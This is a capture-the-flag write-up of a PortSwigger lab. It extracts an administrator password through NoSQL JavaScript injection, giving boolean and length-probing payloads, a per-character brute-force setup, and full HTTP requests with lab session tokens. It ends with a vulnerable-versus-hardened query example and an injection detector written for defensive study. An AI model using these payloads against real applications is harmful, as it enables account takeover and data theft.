PortSwigger: Exploiting NoSQL injection to extract data

Solution

Log in to the website as user: wiener


NoSQL payload: a single quote

Response is the error:  "message": "There was an error getting user details" (the quote breaks the query syntax, which suggests the parameter is concatenated into a server-side query)
---
Payload: wiener'
---
GET /user/lookup?user=wiener' HTTP/2
Host: 0a0900bc036a98ac80c87b8e00350000.web-security-academy.net
Cookie: session=z7mbEvdumZ1li3qvoXXoMYb9jlMuuxW9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0900bc036a98ac80c87b8e00350000.web-security-academy.net/my-account?id=wiener
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers

NoSQL payload: boolean condition

With the false condition ('1'=='2') the response is the error:  "message": "Could not find user"; with the true condition ('1'=='1') the user details are returned, which confirms that injected JavaScript is evaluated
---
Payload: wiener' && '1'=='2
Payload: wiener' && '1'=='1
---
GET /user/lookup?user=wiener'+%26%26+'1'%3d%3d'2 HTTP/2
Host: 0a0900bc036a98ac80c87b8e00350000.web-security-academy.net
Cookie: session=z7mbEvdumZ1li3qvoXXoMYb9jlMuuxW9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0900bc036a98ac80c87b8e00350000.web-security-academy.net/my-account?id=wiener
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers
---
GET /user/lookup?user=wiener'+%26%26+'1'%3d%3d'1 HTTP/2
Host: 0a0900bc036a98ac80c87b8e00350000.web-security-academy.net
Cookie: session=z7mbEvdumZ1li3qvoXXoMYb9jlMuuxW9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0900bc036a98ac80c87b8e00350000.web-security-academy.net/my-account?id=wiener
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers

Check that the user administrator exists

GET /user/lookup?user=administrator HTTP/2
Host: 0a0900bc036a98ac80c87b8e00350000.web-security-academy.net
Cookie: session=z7mbEvdumZ1li3qvoXXoMYb9jlMuuxW9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0900bc036a98ac80c87b8e00350000.web-security-academy.net/my-account?id=wiener
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers

Determine the password length for user administrator

Password length: 8 characters (`< 9` returns the user details, `< 8` returns "Could not find user")
Payload: administrator' && this.password.length < 9 || 'a'=='b
Payload: administrator' && this.password.length < 8 || 'a'=='b
---
GET /user/lookup?user=administrator'+%26%26+this.password.length+<+9+||+'a'%3d%3d'b HTTP/2
Host: 0a0900bc036a98ac80c87b8e00350000.web-security-academy.net
Cookie: session=z7mbEvdumZ1li3qvoXXoMYb9jlMuuxW9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0900bc036a98ac80c87b8e00350000.web-security-academy.net/my-account?id=wiener
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers
---
GET /user/lookup?user=administrator'+%26%26+this.password.length+<+8+||+'a'%3d%3d'b HTTP/2
Host: 0a0900bc036a98ac80c87b8e00350000.web-security-academy.net
Cookie: session=z7mbEvdumZ1li3qvoXXoMYb9jlMuuxW9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0900bc036a98ac80c87b8e00350000.web-security-academy.net/my-account?id=wiener
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers

Brute-force the password character by character

Result: password kocqgsel
---
Set up a Burp Intruder "Cluster bomb" attack with two payload positions: the character index and the candidate character
Payload position 1: "Numbers" --> 0-8
Payload position 2: "Simple list" --> a-z
GET /user/lookup?user=administrator'+%26%26+this.password[0]%3d%3d'a 
---
GET /user/lookup?user=administrator'+%26%26+this.password[7]%3d%3d'l HTTP/2
Host: 0a0900bc036a98ac80c87b8e00350000.web-security-academy.net
Cookie: session=z7mbEvdumZ1li3qvoXXoMYb9jlMuuxW9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0900bc036a98ac80c87b8e00350000.web-security-academy.net/my-account?id=wiener
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers
Connection: keep-alive

Login to Admin Panel

Login: administrator
Password: kocqgsel
---
POST /login HTTP/2
Host: 0a0900bc036a98ac80c87b8e00350000.web-security-academy.net
Cookie: session=L4N9kIM52PJD2QNBPtUpVP0ZLkPANdTq
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
Origin: https://0a0900bc036a98ac80c87b8e00350000.web-security-academy.net
Referer: https://0a0900bc036a98ac80c87b8e00350000.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=58DetBhKQz18dqF5Vy5Ykq3pbWdMvr0r&username=administrator&password=kocqgsel
---
GET /my-account?id=administrator HTTP/2
Host: 0a0900bc036a98ac80c87b8e00350000.web-security-academy.net
Cookie: session=3Ecd9H4ckk2OeTrOMTBsqFPMMlXbEYcg
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0900bc036a98ac80c87b8e00350000.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
GET /user/lookup?user=administrator HTTP/2
Host: 0a0900bc036a98ac80c87b8e00350000.web-security-academy.net
Cookie: session=3Ecd9H4ckk2OeTrOMTBsqFPMMlXbEYcg
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0900bc036a98ac80c87b8e00350000.web-security-academy.net/my-account?id=administrator
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers

Solved
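The walkthrough above works because a quote in the `user` parameter ends up inside server-side JavaScript that the database evaluates. The following is an added example, not code from the lab or from this writeup: it assumes (the lab's server code is not shown) that `/user/lookup` built a MongoDB `$where` string by concatenating the parameter, shows the hardened equivalent a developer should use instead, and runs a small detector over constructed request lines modelled on the traffic above. The `buildLookupQuery*` and `inspectRequestLine` names and the detection patterns are this example's own.

```javascript
// Added example, not part of the PortSwigger lab or this writeup.
// Assumption: the /user/lookup endpoint built a MongoDB $where JavaScript
// string by concatenating the `user` parameter (the lab's server code is
// not shown). Everything below runs offline with no database.

// 1. VULNERABLE construction (hypothetical): a single quote in `user`
//    terminates the string literal, so the rest is evaluated as JavaScript.
function buildLookupQueryVulnerable(user) {
  return { $where: `this.username == '${user}'` };
}

// 2. HARDENED construction: plain equality on the username field, with a
//    strict type check (rejects objects such as {"$ne": ""}) and a
//    conservative allow-list for the value. No server-side JavaScript.
const USERNAME_RE = /^[A-Za-z0-9_.-]{1,32}$/;

function buildLookupQuerySafe(user) {
  if (typeof user !== "string" || !USERNAME_RE.test(user)) {
    throw new TypeError("invalid username");
  }
  return { username: user };
}

// 3. DETECTION: decode the query string of a request line and count how
//    many injection indicators each parameter value matches. The patterns
//    are constructed for this example from the tokens seen in the lab traffic.
const INJECTION_PATTERNS = [
  /'\s*(&&|\|\|)/,       // quote followed by a JavaScript boolean operator
  /this\.[A-Za-z_]+/,    // access to a document property (this.password)
  /\.length\s*[<>=]/,    // length probing
  /\[\d+\]\s*==/,        // per-character index comparison
  /==\s*'/,              // string equality test closing a broken literal
];

function inspectRequestLine(line) {
  const m = line.match(/^(GET|POST)\s+(\S+)/);
  if (!m) return null;
  // Base URL is a placeholder; only the path and query are of interest.
  // URLSearchParams decodes %26%26 -> &&, %3d%3d -> == and '+' -> space.
  const url = new URL(m[2], "https://placeholder.invalid");
  const findings = [];
  for (const [param, value] of url.searchParams) {
    const score = INJECTION_PATTERNS.filter((p) => p.test(value)).length;
    if (score > 0) findings.push({ param, value, score });
  }
  return { path: url.pathname, findings };
}

// Constructed sample: request lines modelled on the writeup's traffic.
const SAMPLE_REQUEST_LINES = [
  "GET /user/lookup?user=wiener HTTP/2",
  "GET /user/lookup?user=wiener'+%26%26+'1'%3d%3d'1 HTTP/2",
  "GET /user/lookup?user=administrator'+%26%26+this.password.length+<+9+||+'a'%3d%3d'b HTTP/2",
  "GET /user/lookup?user=administrator'+%26%26+this.password[7]%3d%3d'l HTTP/2",
];

// Returns only the requests that carry at least one injection indicator.
function scanSampleLog() {
  return SAMPLE_REQUEST_LINES
    .map(inspectRequestLine)
    .filter((r) => r && r.findings.length > 0);
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(buildLookupQueryVulnerable("wiener' && '1'=='1").$where);
  for (const r of scanSampleLog()) console.log(r.path, r.findings);
}
```

The type check in `buildLookupQuerySafe` matters even without `$where`: if the same parameter is ever read from a JSON body, an object such as `{"$ne": ""}` would otherwise become a query operator. Scoring several indicators per value rather than matching one string keeps the detector useful against the URL-encoding variations seen in the requests above.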